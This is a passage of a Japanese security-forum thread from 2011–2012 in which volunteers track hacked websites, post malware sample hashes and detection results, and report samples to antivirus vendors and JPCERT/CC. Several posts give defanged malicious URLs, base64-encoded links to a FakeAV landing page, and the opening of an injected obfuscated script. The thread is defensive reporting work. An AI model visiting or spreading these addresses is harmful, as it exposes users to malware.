848八頭 ◆YAGApwSaEw :2011/09/25(日) 19:34:31.64
Aviraとセキュアブレインとシマンテックへ依頼を出しました。
849/名無しさん[1-30] ◆.htmlint.U :2011/09/25(日) 20:50:54.06
>>846
( ゚д゚)ビンゴー>>794
>>837,841-842

>>848
乙です。
850名無しさん@お腹いっぱい。:2011/09/26(月) 00:08:29.40
http://www●cometcrash●com

このサイト乗っ取られちゃってるんですかね?
グーグルのキャッシュだとゲーム関連のサイトのようですし。
851名無しさん@お腹いっぱい。:2011/09/26(月) 00:36:58.77
>>850
Server HackeD By TiGER M@TE

遊んでますねw
852名無しさん@お腹いっぱい。:2011/09/28(水) 20:31:04.95
2000鯖サイト改竄の模様ですが.....

怪しげなGenuineCheck.exeが開くと落ちて着ます
サイト開くのに必要なのか.....Winエミ梨で実行不能だけど
853名無しさん@お腹いっぱい。:2011/10/07(金) 20:26:16.04
854/名無しさん[1-30] ◆.htmlint.U :2011/10/07(金) 21:19:54.98
もう何も見えない

JSUNPACK
1f8a23b66cec81cb6d0305139524e72e0a7ec842
855/名無しさん[1-30] ◆.htmlint.U :2011/10/07(金) 21:20:50.16
んーどぼじよう

>>854は目の痛み
856名無しさん@お腹いっぱい。:2011/10/07(金) 22:37:44.66
>>854
リンク先のアダルトサイトからscandsk.exeが落ちてきた
…けどVMで実行しても何も起きず。

とりあえずavastに検体提出
857/名無しさん[1-30] ◆.htmlint.U :2011/10/07(金) 22:51:12.36
>>853
オツカレサマです。
&lr=lang_ja
日本語ページのある彼の国とこへメル
蒲公英は現在無い模様。。。
858/名無しさん[1-30] ◆.htmlint.U :2011/10/07(金) 22:53:35.88
>>856
お疲れ様です。
nu蹴られちゃってるっぽいので助かりまうす。
859/名無しさん[1-30] ◆.htmlint.U :2011/10/07(金) 23:37:38.16
っと、もひとつあたー>>857
860/名無しさん[1-30] ◆.htmlint.U :2011/10/07(金) 23:41:11.52
861名無しさん@お腹いっぱい。:2011/10/07(金) 23:44:09.95
結構なスルー率だねえ
862/名無しさん[1-30] ◆.htmlint.U :2011/10/07(金) 23:49:18.57
>>859
過去ログっぽかった。
あきたねる
863名無しさん@お腹いっぱい。:2011/10/07(金) 23:50:48.47
>>860-861
BitDefenderだけw
864/名無しさん[1-30] ◆.htmlint.U :2011/10/08(土) 23:36:04.68
VTしぼー中
>>860
別のアドレスに飛ばされるようになたー。ファイルは同じもの
865名無しさん@お腹いっぱい。:2011/10/10(月) 10:18:34.31
http://www●huimeihotel●com/
http://www●huihuahotel●com●cn/

evar●lflink●comがそうなのかな
866名無しさん@お腹いっぱい。:2011/10/10(月) 11:20:10.16
ckt6●cnじゃなイカ?
867/名無しさん[1-30] ◆.htmlint.U :2011/10/11(火) 01:10:09.00
>>865-866


>>865
IPAとかにつーほー

>>866
IPAとかに丸投げしますた。。。おrz。。。。。。
868/名無しさん[1-30] ◆.htmlint.U :2011/10/11(火) 03:28:14.51
>>583
>>853
( ゚∀゚)アハハ八八ノヽノヽノヽノ \ / \/ \

だりかお願い
869/名無しさん[1-30] ◆.htmlint.U :2011/10/11(火) 19:22:47.23
ノシシ


やっと消えたお >>868,>>583
870865:2011/10/11(火) 22:26:58.94
>>866-867
乙です〜
871/名無しさん[1-30] ◆.htmlint.U :2011/10/12(水) 00:07:43.37
>>870



悲しいお知らせ
折角10/43まで逝った>>860ですが…
http://www.virustotal.com/file-scan/report.html?id=7e3d271dd1883d44051abb2b0380248cb7dd58164b18bb34a15a4031a5ac37e5-1318345034
4/43のご新規になりますた。。。
872名無しさん@お腹いっぱい。:2011/10/12(水) 01:07:08.43
>>871
いつも乙です
時間のある時にでもまた検体調査に行ってくるかな・・・
873/名無しさん[1-30] ◆.htmlint.U :2011/10/12(水) 22:35:11.70
874名無しさん@お腹いっぱい。:2011/10/13(木) 00:15:16.81
875/名無しさん[1-30] ◆.htmlint.U :2011/10/14(金) 21:49:53.94
VT
うrl
c41e3a4f7ce7de96783854658a1241c7-1318588576
ふぁいる
786d47110b92908dd5ced091bfea6046ddd8a87b0770abecfae61628b7199563-1318596141

JSUNPACK
f0091f107e0bd469a047c33d1f9c4c20c4d239d9

飛び先はまたころころ変わりそう。。。
876/名無しさん[1-30] ◆.htmlint.U :2011/10/14(金) 22:06:57.32
877名無しさん@お腹いっぱい。:2011/10/15(土) 22:23:53.57
>>876
すでにリンク先が変更に・・・毎日変更ですかorz
今回はWebページ型FakeAV付き

Jsunpack
928990f5a388f32839a21c81c23ee4f880d42693

Webページ
f958e91b6e19ecfb7d6fac4c94231b0abb7ad2bac31c692b9c87ff6027a8bacb-1318684027
2/ 42 (4.8%)

本体EXE
8065d71f793769d4d9cc1c341e2d038d95428e0aeeaf3702c9e31ff590921747-1318684037
12/ 43 (27.9%)

落ちてきたルートキット?(既出っぽい)
8fb7c5dc29ca514bc2987d270513c86a3084466b23213d224408c682b8171405-1318684489
25/ 43 (58.1%)
878/名無しさん[1-30] ◆.htmlint.U :2011/10/16(日) 02:03:22.80
>>877
お疲れ様です。

ぐぐったこれは関連するのかな?
ttp://www.threatexpert.com/report.aspx?md5=af0099681d9d24d1f887562e9d8c180a
879名無しさん@お腹いっぱい。:2011/10/16(日) 03:50:20.54
>>878
いつもお疲れ様です

MD5同じなので同じファイルっぽいですね
scandsk.exeが相変わらず何もしないのでAnubisで解析させてみた
http://anubis.iseclab.org/?action=result&task_id=1a146b96de71dc7d4d5f47216b74caffe&format=html#id285810

…鯖が死んでてマルウェアダウンロードに失敗してるのかな
880/名無しさん[1-30] ◆.htmlint.U :2011/10/16(日) 04:26:40.61
>>879
どもです。
またぐぐる。
http://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~FakeAV-EPV/detailed-analysis.aspx
http://about-threats.trendmicro.com/malware.aspx?language=jp&name=TROJ_FAKEAV.GAC

301でbingに飛ばしてるとこはまだ死んでないっぽい?

aHR0cDovL21lZ2Fsb2Rvbi5qcC8yMDExLTEwMTYtMDQyNC0wNi93d3cuZGFuLmNvLnVrL3ZpZXdz
b3VyY2UvaW5kZXgucGhwP3VybD1odHRwJTNBJTJGJTJGOTguMTQyLjI0My42NCUyRmNocm9tZSUy
RnJlcG9ydC5odG1sJTNGNTU1NTV3NSUzRCU1RCVFRiVCRiVCRCVFRiVCRiVCRGNrJUVGJUJGJUJE
Y2dqZCVFRiVCRiVCRGolRUYlQkYlQkRqbW5oZSVEOCU5OSVFRiVCRiVCRG4lRUYlQkYlQkQlRUYl
QkYlQkQlRUYlQkYlQkQlRUYlQkYlQkRnJUVGJUJGJUJEZGtfamslNUIlRUYlQkYlQkQlRUYlQkYl
QkRyJUVGJUJGJUJEJUVEJThEJTg5JTVFJUVGJUJGJUJEJUVGJUJGJUJEJUVGJUJGJUJEb2Nna2RU
JUVGJUJGJUJEJUVGJUJGJUJEJUVGJUJGJUJEciVFRiVCRiVCRCVFRiVCRiVCRGIlQ0MlODhfJUVG
JUJGJUJEJUVGJUJGJUJEJUVGJUJGJUJEcWdveHVkZ3lramhnaHolRUYlQkYlQkR6a3phZXdoYmN2
Y2Nsamlmd2YlNUIlRTklOUElQUN1X2FkYiU1RWRkYyU1RWZkZmVlZWUlRUYlQkYlQkRlaWpUJUVG
JUJGJUJEcWIlNUViZGNfZmhZ
881 ◆f9.GznAUAlK. :2011/10/17(月) 01:40:02.87
EXEとWebページがまた新型に。本当に毎日変更ですなw

EXE
16d9696f4a32bcd571c5c55ac5e4fcb9cc3348ac7ec936ad6c46c447e63d626b-1318780277

Webページ
ab0e74102c941cff75b0ee3469c95a41484d29043d17f874a5faa5f14665805d-1318781102

VMだから偽アンチウイルスが発動しないのか、日本IPは弾かれてるのか…
往時の8080は鯖さえ生きてればお構いなく発動したもんですが
882/名無しさん[1-30] ◆.htmlint.U :2011/10/20(木) 00:28:28.01
もう、いやん
JSUNPACK
d127c4dba13422aaba02157e6e0111c09d91401f
883名無しさん@お腹いっぱい。:2011/10/23(日) 23:48:57.87
884名無しさん@お腹いっぱい。:2011/10/24(月) 03:23:51.31
>>883
http://www.google.co.jp/search?q=site:www.bookoff.co.jp+%E6%94%B9%E3%81%96%E3%82%93
子会社含めて今度で4回目って酷いな
HP管理委託業者の名前を晒してほしい
885名無しさん@お腹いっぱい。:2011/10/24(月) 14:19:03.27
ブックオフかい…
886名無しさん@お腹いっぱい。:2011/10/26(水) 08:44:21.65
http://koikemasaya●com/

gredでフィッシングサイト判定になっていて改ざんされてるっぽい
887名無しさん@お腹いっぱい。:2011/10/26(水) 18:50:47.74

大規模なASP.NET攻撃によりWebサイトが訪問者を攻撃
http://scan.netsecurity.ne.jp/archives/52024460.html
888名無しさん@お腹いっぱい。:2011/10/26(水) 19:59:01.74
889/名無しさん[1-30] ◆.htmlint.U :2011/10/27(木) 09:18:12.73
>>886
侵略されちゃってますね
890/名無しさん[1-30] ◆.htmlint.U :2011/10/27(木) 10:41:08.45
>>886
投稿フォームからのスパムっぽい
とりあえずスパムの削除依頼してみた>ばりゅどめ
891名無しさん@お腹いっぱい。:2011/10/27(木) 19:37:13.76
>>889-890
ご対応感謝するでゲソ!
892/名無しさん[1-30] ◆.htmlint.U :2011/11/08(火) 03:38:49.36
virscan.orgって更新されたっぽい?
893名無しさん@お腹いっぱい。:2011/11/08(火) 12:35:42.54
ぱっと見た感じ従来と変わらんようだけど?
894名無しさん@お腹いっぱい。:2011/11/08(火) 14:52:31.07
http://uptime.netcraft.com/up/graph?site=http://virscan.org/
IPアドレスが一時的に変わってた
代替サーバにしてメンテナンスしてたのかも
895/名無しさん[1-30] ◆.htmlint.U :2011/11/08(火) 20:42:12.85
ノシ
896名無しさん@お腹いっぱい。:2011/11/11(金) 13:51:12.50
Flash 11.1.102.55
897名無しさん@お腹いっぱい。:2011/11/22(火) 12:31:57.71
ESETのステマサイトだろうけどGumblarの解説としては読みやすい
http://www.seculead.jp/tokushu/gumblar.html
http://30tx.com/ ツイッターで宣伝中 http://goo.gl/sNq5y+

公式で堂々とやらないのが-100点
898名無しさん@お腹いっぱい。:2011/11/25(金) 19:45:49.36
Gumblarは今は活動してないよ
Gumblar.xは2010年11月以降動かず止まったまま
htaccessリダイレクトは偽ウイルス対策ソフトの感染キャンペーン

Wordpressのtimthumb.phpの脆弱性でだいぶ攻撃がお盛ん (´A`;
ttp://www.google.co.jp/search?q=%22Fatal+error:+Cannot+redeclare+_765258526%22&hl=ja&lr=lang_ja&num=100
899/名無しさん[1-30] ◆.htmlint.U :2011/11/25(金) 21:37:39.75
>>898
ぅゎゎ

調子悪いので保留。。。orz.....
900/名無しさん[1-30] ◆.htmlint.U :2011/11/25(金) 21:48:01.90
こんなかんじ?
JSUNPACK
899a47a3cb97a613973f7721405b58670ee8a5ad
飛び先は404っぽい
901/名無しさん[1-30] ◆.htmlint.U :2011/11/25(金) 21:50:35.94
なんか違ってた
>>900はなかったことに。。。
902/名無しさん[1-30] ◆.htmlint.U :2011/11/25(金) 21:53:40.02
ん?合ってるんかな?
903/名無しさん[1-30] ◆.htmlint.U :2011/11/25(金) 22:08:28.50
904/名無しさん[1-30] ◆.htmlint.U :2011/11/25(金) 22:52:35.63
げっとしたっぽい

aHR0cDovL21lZ2Fsb2Rvbi5qcC8yMDExLTExMjUtMjIzOC0wNy9yZC5vci50bC9nZXQucGhwP3Np
dGU9aHR0cCUzQSUyRiUyRm1lc3Npbm9oZXlhJTJFaW5mbyUyRmF1dGhvciUyRmFkbWluJmFjdD12
aWV3


二回目以降のアクセスはスクリプトが消える仕様?

aHR0cDovL21lZ2Fsb2Rvbi5qcC8yMDExLTExMjUtMjI0OC0yMS9yZC5vci50bC9nZXQucGhwP3Np
dGU9aHR0cCUzQSUyRiUyRm1lc3Npbm9oZXlhJTJFaW5mbyUyRmF1dGhvciUyRmFkbWluJmFjdD12
aWV3DQpodHRwOi8vbWVnYWxvZG9uLmpwLzIwMTEtMTEyNS0yMjMyLTQ3L3d3dy5kYW4uY28udWsv
dmlld3NvdXJjZS9pbmRleC5waHA/dXJsPWh0dHAlM0ElMkYlMkZtZXNzaW5vaGV5YSUyRWluZm8l
MkZhdXRob3IlMkZhZG1pbg==


>>900で見つけたはずなのに、わからなくなったので>>901
905/名無しさん[1-30] ◆.htmlint.U :2011/11/25(金) 23:04:09.53
906/名無しさん[1-30] ◆.htmlint.U :2011/11/26(土) 00:25:48.47
907名無しさん@お腹いっぱい。:2011/11/26(土) 00:26:18.87
 
908名無しさん@お腹いっぱい。:2011/11/30(水) 16:19:43.20
[厚労省サーバー感染、PC1万台ネット接続不能]
http://www.yomiuri.co.jp/national/news/20111129-OYT1T01327.htm

労災などの業務管理を行う厚生労働省の情報システムのサーバーが、ウイルス対策ソフトを装ったコンピューターウイルス
に感染し、同システムにつながる全国約1万台のパソコンが点検のため、今月25日からインターネットに接続できなくな
っていることが、わかった。情報流出は確認されていない。ウイルスは無差別に感染するタイプとみられ、同省が復旧を急
いでいる。

同省によると、感染したのは、労災の申請や認定、支給などの処理を行う情報システム。今月25日、福岡労働局の職員が
業務中に企業のホームページを閲覧中、パソコンが勝手にウイルス検索を始めるなどしたため、不審に思った職員が申し出
て感染が判明した。
ウイルス対策会社によると、このウイルスはネット上で仕込まれたページを開いただけで感染するタイプで、ウイルス対策
ソフトを装ってクレジットカード情報などを要求。2年ほど前から国内でも感染が増加しているという。

▽読売新聞(2011年11月30日03時09分)
909名無しさん@お腹いっぱい。:2011/11/30(水) 18:41:10.73
コンピューターウイルスにやられたと偽って
わざと流出させている恐れもある
910名無しさん@お腹いっぱい。:2011/12/03(土) 17:41:46.77
ちゃんとJRE 6 Update 29にしておるかー?
そこで対処されたCVE-2011-3544の攻撃処理がBlackholeに積まれたぞい ヽ(;´Д`)ノ
ttps://www-304.ibm.com/connections/blogs/tokyo-soc/entry/dbyd_20111031
911名無しさん@お腹いっぱい。:2011/12/04(日) 21:57:18.29
www●cave●co●jp

Googleでは「このサイトはコンピュータに損害を与える可能性があります。」になってる
912/名無しさん[1-30] ◆.htmlint.U :2011/12/05(月) 01:18:47.19
ちょいまえに北
見てる途中でメンテになったお
ここ見てるのかな?
913名無しさん@お腹いっぱい。:2011/12/05(月) 02:01:48.90
ユーザーから言われたか何かで気づいたのかもしれん
914/名無しさん[1-30] ◆.htmlint.U :2011/12/05(月) 02:26:39.36
そかも

とりあえずそれっぽいのはげとしたかも
飛び先は404っぽい

JS(ry
8674564d35fb2e06f5ec059b6bfded1b26c048ea

V(ry
9f065297b0fa42157b748f285347a1d3a8401d3e9c58dee686fd82392b169abc

IPAとJPCERT/CC、ベンダーいくつかにトス
915/名無しさん[1-30] ◆.htmlint.U :2011/12/05(月) 02:46:59.99
まかひからdatが北
なんか早いぽ。
916/名無しさん[1-30] ◆.htmlint.U :2011/12/07(水) 02:27:32.21
>>914
あびら対応予定
JS/IFrame.aba
917名無しさん@お腹いっぱい。:2011/12/10(土) 00:17:15.09
www●wisdomlead●co●jp/
918/名無しさん[1-30] ◆.htmlint.U :2011/12/10(土) 01:10:36.98
眩暈が
919/名無しさん[1-30] ◆.htmlint.U :2011/12/10(土) 03:31:05.12
>>917
お疲れ様です。
上流にメルしまひた。

なつかしの8080とかぱっとみでみっつスクリプトの内ふたつは検出率が低かったのでベンダーにトスしやした。
かすぺの自動応答にスパム扱いされちゃいました。
踏み台になってたかもん
920名無しさん@お腹いっぱい。:2011/12/14(水) 00:56:42.73
ttp://member.square-enix.com/
ttp://www.square-enix.com/jp/members/info/mainte.html
これの詳細わかる人居ますかね?
検体拾いたいんだけどGoogleキャッシュにも残ってねぇ
921名無しさん@お腹いっぱい。:2011/12/14(水) 11:44:13.45
922名無しさん@お腹いっぱい。:2011/12/14(水) 23:52:45.36
>>920
詳細わからんのでなんともいえんけど
クライアントへの攻撃スクリプトが仕込まれたわけじゃなくて
どっかの入力フォームからサーバーが攻撃されたってだけかもよ
923名無しさん@お腹いっぱい。:2011/12/15(木) 00:04:10.70
ああ改ざんもあったのね
期間短いと探せないかもな
924名無しさん@お腹いっぱい。:2011/12/15(木) 03:41:22.48
>>920
NEVERのキャッシュ
925名無しさん@お腹いっぱい。:2011/12/15(木) 06:16:29.38
見つからんかった
926八頭 ◆YAGApwSaEw :2011/12/23(金) 22:26:04.73
http://www.

allgov.com/Unusual_News/ViewNews/
Last_Man_Still_Living_in_Japans_Nuclear_Exclusion_Zone_111223


Aviraに反応のあったサイト
シマとグレッドには伝えておきました。
各自念の為伝達よろしくお願いします。(ちなみに。。。海外の福島関連の記事です)


avira.com解説
http://www.avira.com/ja/support-threats-summary-product/tid/4486/threat/HTML%252FPicFrame.Gen/track/1
※ヒューリスティック特別な検出
927名無しさん@お腹いっぱい。:2011/12/25(日) 15:35:32.98
>>926
これは誤検知、というか実害がない
CAPTCHA用の画像ファイル内部にHTMLタグが誤って挿入されてしまってるだけ
928名無しさん@お腹いっぱい。:2012/01/03(火) 01:50:45.34
絶賛放置中
www●hototogisu-kun●com/

<script type='text/javascript'>eval(function(p,a,c,k,e,d・・

("p") か
 ("o") い
  ("q") ざ
   ("r") ん
929/名無しさん[1-30] ◆.htmlint.U :2012/01/03(火) 09:54:24.30
ちょい前北
>>928
見てる間にコード消されたっぽい
930/名無しさん[1-30] ◆.htmlint.U :2012/01/03(火) 10:00:08.92
JSUNPACK
636292fe671d98d993c0a8af701627c4750e1003

飛び先は404っぽい
931/名無しさん[1-30] ◆.htmlint.U :2012/01/03(火) 21:41:21.64
って、戻ってるお (´・ω・`)
消したんじゃなかったのか?>928
932/名無しさん[1-30] ◆.htmlint.U :2012/01/03(火) 21:52:50.30
再改竄かお。
JSUNPACK
5f2bcf2b562358f2fd82d6b470c6e3a3e4ec3b53
933/名無しさん[1-30] ◆.htmlint.U :2012/01/04(水) 14:42:13.43
934名無しさん@お腹いっぱい。:2012/01/09(月) 02:46:11.52
>>928-933
Dan's View Sourceの魚拓
backupurl●com/31luot
935八頭 ◆YAGApwSaEw :2012/01/12(木) 22:16:23.00
皆さん乙彼~
時々、最新情報をチェックしてみて下さい。。。


改ざん - Google ニュース検索 (*日付順 )
http://goo.gl/9bsMb

サイバー攻撃 - Google ニュース検索 (*日付順 )
http://goo.gl/N7GCO
936名無しさん@お腹いっぱい。:2012/01/12(木) 22:45:21.10
やがちゃんのでも短縮URLは踏む気にならんわ
937名無しさん@お腹いっぱい。:2012/01/13(金) 11:47:16.24
VirusTotalがリニューアルされてますね。
Max32MBまでになってるし。
あとは落ちている事が少なくなればいいなぁ。
938名無しさん@お腹いっぱい。:2012/01/15(日) 09:39:52.74
http://dispatch100511n●blog●so-net●ne●jp

んー
939 ◆f9.GznAUAlK. :2012/01/15(日) 12:32:18.82
>>938
久しぶりに検体が落ちてきた
順次virustotalに上げてみる
940 ◆f9.GznAUAlK. :2012/01/15(日) 13:07:03.32
941八頭 ◆YAGApwSaEw :2012/01/17(火) 00:57:57.16
>>936
つホレ

■Know URL - 短縮URLを展開チェック
http://knowurl.com/
■GetLinkInfo - 短縮URLを展開チェック
http://www.getlinkinfo.com/
942名無しさん@お腹いっぱい。:2012/01/17(火) 01:20:18.40
>>941
めんどい
943名無しさん@お腹いっぱい。:2012/01/17(火) 07:30:21.49
攻撃者向けのマルウェアチェックサイトをロシアで発見
http://scan.netsecurity.ne.jp/article/2012/01/13/28107.html
944名無しさん@お腹いっぱい。:2012/01/17(火) 11:28:26.31
そういうのは前からあるよね
ttp://lhsp.s206.xrea.com/misc/virusscan.html#crimescan
945八頭 ◆YAGApwSaEw :2012/01/22(日) 19:27:47.82
セキュリティ初心者質問スレッドpart129
http://kohada.2ch.net/test/read.cgi/sec/1323593004/79
5箇所ほど貼られてるようだけど
これ何?IPはベナン。。。
http://www

-mediafire-com-wmi9t7s3zu9z251.tk/
946八頭 ◆YAGApwSaEw :2012/01/22(日) 19:38:16.47
urlvoid.com調査ではIP Countryはチェコでした。UNRATEDが4件。
virustotal.comではUNRATEDが3件
947名無しさん@お腹いっぱい。:2012/01/25(水) 16:39:49.64
948名無しさん@お腹いっぱい。:2012/01/25(水) 17:20:15.97
世界は喫煙を推進しています。会から有能な人材がウィキペディアに参加しています。皆様方も喫煙化にご協力ください。
949名無しさん@お腹いっぱい。:2012/01/25(水) 18:02:09.96
>>947
なんたらかんたら.osa.pl/showthread.php?t=なんたらかんたら
950 忍法帖【Lv=3,xxxP】 :2012/01/30(月) 18:57:58.39
復活の呪文
951名無しさん@お腹いっぱい。:2012/02/04(土) 15:22:48.91
www●dernier-exile●com

んー
952名無しさん@お腹いっぱい。:2012/02/05(日) 23:53:48.18
www.majin0001●com/
953名無しさん@お腹いっぱい。:2012/02/16(木) 00:40:26.33
JRE 脆弱性更新
954名無しさん@お腹いっぱい。:2012/02/29(水) 17:14:05.52
;; ::: :: :  :   _____________    :  : : : :: :::: ::::: :;::;::::: ::::
;;::: ::: :: : :   /|:: ┌──────┐ ::| / ピロン♪ピロン♪ : ::: :::: :;::;
;;::: ::: : :   . . |:: |         .| ::| 緊急ぬるぽ速報です : :: : ::: ::;:;
;;: :: :;;: :: :    |:: 緊急ぬるぽ速報 ..::|  強いぬるぽに警戒してください
;;: :: : ;;: :: :  .. |::..|         ..| ::| \              : :: :: ::; :: ;
;;: :: : ;;: :: : .. |::..└──────┘::| : :: :: ::; :: ; : :: :: ::; :: ;: :: :: ::: :: :: ; :: ;
;: : ;;: :: :  ... |::   ┌────┐   | : :: :: ::; :: ; : ; : :; : :: :: :: :: :: :::; :: ;
     || ドサッ  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄    //∧_∧
  ☆   __   ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄(((゙゚'ω゚'))) うぁぁぁ
    ヽ/\_\ ゴン    [#]::       ::[#] と_   ヽ ヽ
      \/__/ ⌒)   | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄| _)))
    ⊂⌒((;‐ω‐))    ̄| ̄| ̄ ̄ ̄ ̄ ̄ ̄| ̄| ̄   ~}
955名無しさん@お腹いっぱい。:2012/03/07(水) 13:43:40.07
ガンブラー攻撃の再来? FTPパスワードを盗むマルウェア感染の報告相次ぐ
http://www.itmedia.co.jp/enterprise/articles/1203/06/news048.html
956名無しさん@お腹いっぱい。:2012/03/11(日) 19:14:10.27
957名無しさん@お腹いっぱい。:2012/03/13(火) 14:42:59.67
jsunpackって最近死んでる?
958名無しさん@お腹いっぱい。:2012/03/13(火) 17:49:21.74
wepawetでok
959名無しさん@お腹いっぱい。:2012/03/26(月) 20:27:44.46
http○//proxyrider○com
960名無しさん@お腹いっぱい。:2012/05/10(木) 23:39:30.05
ほしゅ
961名無しさん@お腹いっぱい。:2012/05/12(土) 00:31:49.37
保守あげ
962名無しさん@お腹いっぱい。:2012/05/22(火) 22:09:11.58
あげほす
963名無しさん@お腹いっぱい。:2012/05/23(水) 14:47:43.88
>>960-962
2001年作成のスレがごろごろあるセキュ板で保守など必要ない
964名無しさん@お腹いっぱい。:2012/05/27(日) 10:41:56.94
AvastとAviraは例外として
それ以外・・・すなわち、@Panda AAVG BALYac CJUST DKing EComodo FMSE
このあたりのフリーソフトでどれにするか迷っているなら、絶対にFMSEにすべきだね
日々ありとあらゆる感染実験をし、世界のクラッカーコミュを渡り歩き
英文でさまざまな解決策論文を発表し、痴餌袋等でも迷える子羊たちにバンバン指南し解決に導いている
FakeAVの研究では世界をリードしているプロの俺様がいうのだから間違いない( ー`дー´)キリッ
965名無しさん@お腹いっぱい。:2012/05/30(水) 20:49:36.25
頭悪そう><;;
966/名無しさん[1-30] ◆.htmlint.U :2012/06/07(木) 03:23:04.12
8080っぽいのが北
こちらの環境では到達できにゃー
件名 : POST/EDIT/DELETE : "Local News in Astoria Journal " (rvs)

d9378c84f32ddc157bdbe1b59790fa084485e4d2
967/名無しさん[1-30] ◆.htmlint.U :2012/07/04(水) 02:05:50.67
蕗カキコ
968名無しより愛をこめて:2012/07/04(水) 03:32:34.57
.
969名無しさん@お腹いっぱい。:2012/07/14(土) 09:05:25.25
TCG「ヴァンガード」の公式HPがウィルス感染とかいう話題を耳にしたんだが・・・?
970名無しさん@お腹いっぱい。:2012/07/14(土) 18:50:45.14
>>969
ニュースでやってたね。
具体的なウイルスの種類は言わなかったけど。
971名無しさん@お腹いっぱい。:2012/07/14(土) 19:03:41.94
ヴァンガードHPなど3サイトがウイルス感染 中の人「感染したっぽいから閲覧を控えて…。」
http://hayabusa3.2ch.net/test/read.cgi/news/1342251052/
972名無しさん@お腹いっぱい。:2012/07/26(木) 07:40:28.99
http://www●mcd-inc●co●jp/
http://www●matsue-yado●com/
973名無しさん@お腹いっぱい。:2012/07/27(金) 11:35:22.05
乙です。
修正済みっぽい

めも
c3284d
km0ae9gr6m
974名無しさん@お腹いっぱい。:2012/07/28(土) 11:52:50.69
http://www●studiokirsche●com/
http://www●aqua-refine●com/
975名無しさん@お腹いっぱい。:2012/07/29(日) 01:55:23.54
976名無しさん@お腹いっぱい。:2012/07/29(日) 11:29:47.49
どこ?
977名無しさん@お腹いっぱい。:2012/08/06(月) 15:32:47.66
http://kohada.2ch.net/test/read.cgi/bicycle/1343949441/
↑のスレにてGENOの亜種に感染の報告有り。
978純米どうふ ◆17FEKg9vOPOD :2012/08/06(月) 23:01:32.37
>>977
お疲れ様です。
Aviraから「JS/Luyeb.A」で対応予定と回答が来ました。
KasperskyとMicrosoftは回答待ちです。
JPCERT/CCには報告済みです。
979名無しさん@お腹いっぱい。:2012/08/10(金) 00:50:05.37
>>978
対応ありがとうございます。
現在当該サイトは閉鎖しています。
980純米どうふ ◆17FEKg9vOPOD :2012/08/10(金) 13:16:24.74
http://www●eekatei●com/

KasperskyとAviraに検体提出。
JPCERT/CCには報告済みです。
981純米どうふ ◆17FEKg9vOPOD :2012/08/10(金) 16:54:43.80
>>979
ノシ

>>980
結果が返ってきました。
Kaspersky「Trojan.JS.Agent.byo」
Avira「JS/Obfuscated.CR」
982名無しさん@お腹いっぱい。
まーたin.cgiか